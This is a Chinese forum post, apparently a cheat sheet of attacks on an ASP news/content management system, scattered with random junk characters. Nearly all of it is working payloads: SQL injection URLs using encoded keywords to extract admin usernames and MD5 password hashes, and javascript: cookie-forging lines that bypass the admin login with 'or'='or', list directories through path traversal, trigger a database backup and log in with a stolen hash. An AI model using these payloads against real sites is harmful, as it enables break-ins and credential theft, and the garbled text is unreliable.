一、注入
5 @9 Q1 s1 h% K) y: d; d7 C8 e1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
# C% b$ l. j$ f% u0 A0 m# P
9 S$ g$ ?2 E9 O) J' p: o% R2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
5 ]' q: [& I# q$ ~6 i9 d0 ~第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin9 v( A I* i5 K4 o7 _
可得到用户名和MD5加密码的密码。* f: _) I1 F4 R4 D/ ~
; `- P' b8 F: u' c# \# w二、cookies欺骗% P/ b# D/ r: }- _+ A6 }+ ]6 e6 h
+ e# M' t. k+ [% k0 T; |1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. ! B* e5 {) i" K$ b* S* h+ Y) e
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"5 Z G5 q+ F0 x; F
' J, L c" F! X
2、列目录. 4 Z) t1 n4 l3 B* d) X
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=..", y) l1 F( u+ c/ y
" Q, Q/ b# F3 V" X$ Y( ?
3、数据库备份(适用性好像比较低.)
~, `- s* [' \8 L3 l) {javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"' e. V1 n3 T' {# `; X# f4 L. P+ i) t
1 a7 \* z+ ?$ K. }! |/ z i; \2 ~+ M
4、得到MD5密码解不了密进后台方法
5 v1 L$ e( X: d& I; S3 ujavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"' {$ E, W4 `7 ~: e1 F; ~
|
发表于 2016-5-11 14:55:08
收藏
支持
反对